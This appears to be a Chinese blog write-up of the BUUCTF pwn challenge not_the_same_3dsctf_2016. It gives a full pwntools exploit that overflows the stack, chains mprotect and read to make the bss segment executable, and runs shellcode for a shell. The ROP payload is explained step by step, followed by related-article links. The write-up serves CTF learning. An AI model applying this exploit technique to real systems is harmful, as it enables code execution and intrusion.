还是静态链接的，一个文件，自己玩，所以打开IDA找找能用到的函数就可以了，题目也非常简单，栈溢出

from pwn import *context(log_level='debug', arch='i386')proc_name = './not_the_same_3dsctf_2016'
p = process(proc_name)
elf = ELF(proc_name)
bss_start_addr = elf.bss() & ~(elf.bss() % 0x1000)
mprotect_addr = elf.sym['mprotect']
read_addr = elf.sym['read']
# 0x080483b8 : pop esi ; pop edi ; pop ebp ; ret
pop = 0x080483b8
payload = 'a'.encode() * (0x2d) + p32(mprotect_addr) + p32(pop) + p32(bss_start_addr) + p32(0x100) + p32(0x7) + p32(read_addr) + p32(bss_start_addr) + p32(0) + p32(bss_start_addr) + p32(0x100)
p.sendline(payload)
payload1 = asm(shellcraft.sh())
p.sendline(payload1)
p.interactive()

这里我特别解释一下这个payload'a'.encode() * (0x2d) + p32(mprotect_addr) + p32(pop) + p32(bss_start_addr) + p32(0x100) + p32(0x7) + p32(read_addr) + p32(bss_start_addr) + p32(0) + p32(bss_start_addr) + p32(0x100)

• 首先0x2d是main函数中栈空间的大小，它的下一个位置就是ret指令对应的返回地址了
• p32(mprotect_addr)就是mprotect函数的地址，接下来的p32(pop)是为了保持栈平衡而将后面压入的三个参数从栈上弹出，弹出后我们并不使用它，就是为了控制栈的结构，p32(pop)的位置也同样是执行完mprotect后的返回地址，pop对应的指令为pop esi ; pop edi ; pop ebp ; ret，最后ret就跳转到p32(read_addr)这里了
• 同理，p32(read_addr)的下一个p32(bss_start_addr)也是执行完read函数后跳转的地址，后面是read的三个参数

整个思路就是，利用mprotect函数修改bss段为0x7即0b111，可读可写可执行权限，然后利用read函数读入shellcode，最后跳转到shellcode的位置，就成功拿到shell了

BUUCTF not_the_same_3dsctf_2016相关推荐

1. BUUCTF(pwn)not_the_same_3dsctf_2016

   from pwn import* p=remote('node3.buuoj.cn',29208) get_secret=0x80489a0 flag=0x80eca2d write=0x806e27 ...

2. 持续更新 BUUCTF——PWN（一）

   文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...

3. BUUCTF的Web真题学习整理（一）

   目录 WEB1-WarmUp (任意文件包含漏洞) WEB2-高明的黑客(fuzz脚本) WEB3-easy_tornado (服务端模板注入(ssti攻击)) WEB4-Hack World(时间盲 ...

4. [BUUCTF-pwn]——not_the_same_3dsctf_2016

   not_the_same_3dsctf_2016 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 首先checksec一下,看看32 ...

5. BUUCTF寒假刷题-Web

   前言 寒假横向刷题(尽量) BUUCTF

6. BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过

   BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLA ...

7. BUUCTF刷题笔记

   BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1',看看返回的结 ...

8. BUUCTF Quoted-printable编码

   Quoted-printable可译为"可打印字符引用编码",编码常用在电子邮件中,如:Content-Transfer-Encoding: quoted-printable ,它 ...

9. BUUCTF NewStarCTF一些新知识记录

   提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 目录 前言 一.eazyxor 二.RSA_begin 三.Yesec no drumsticks 四.EzSnake 五.Pyre ...

最新文章

1. 支持百万级TPS，Kafka是怎么做到的？答案藏在这10张图里
2. 可爱的特殊字符集收集
3. 1.13 总结-深度学习第三课《结构化机器学习项目》-Stanford吴恩达教授
4. [css] 请说说*{box-sizing: border-box；}的作用及好处有哪些？
5. 复化梯形公式matlab程序_【HPC】高性能数值计算-梯形面积法
6. 红橙Darren视频笔记 View事件分发源码分析 基于API29
7. net core Autofac
8. SSM整理笔记3——配置解析
9. Unity3D使用经验总结 编辑器扩展篇
10. 超简单，一行代码获取百度文库内容，附python百度文库exe下载工具
11. 2019年，北上广等一线城市的IT岗位饱和了么？
12. 转专业申请麦吉尔大学计算机,加拿大大学转专业申请秘籍
13. 狼性精神——《世界上最伟大的推销员》
14. python自学之《21天学通Python》(2)
15. 杭州拱墅区委副书记、区长冯晶一行莅临利尔达参观调研
16. 腾讯滑块JS破解/本地识别DLL
17. 成功WEB商务的7步走（7）——PDCA
18. 莫比乌斯反演-小总结
19. 我们好好聊聊华为Harmony OS，鸿蒙对于智能家居来说意味着什么？
20. NodeMCU文档中文翻译 4 烧写固件

热门文章

1. org.apache.ibatis.builder.BuilderException: Error evaluating expression ‘p.residentCode‘. Return
2. [Jquery]实现三个盒子两两交换的考眼力游戏
3. 《医院管理系统》项目研发总结
4. 计算机毕业设计之 医院管理系统
5. 简要介绍css的盒模型,CSS盒模型的介绍
6. MDC是什么鬼？用法、源码一锅端
7. H5 (React) 移动端监听软键盘弹起、收起
8. 我的世界服务器个体值怎么修改,我的世界神奇宝贝个体值指令 | 手游网游页游攻略大全...
9. 什么是 Build in Public
10. 加载PNG、ANI等资源文件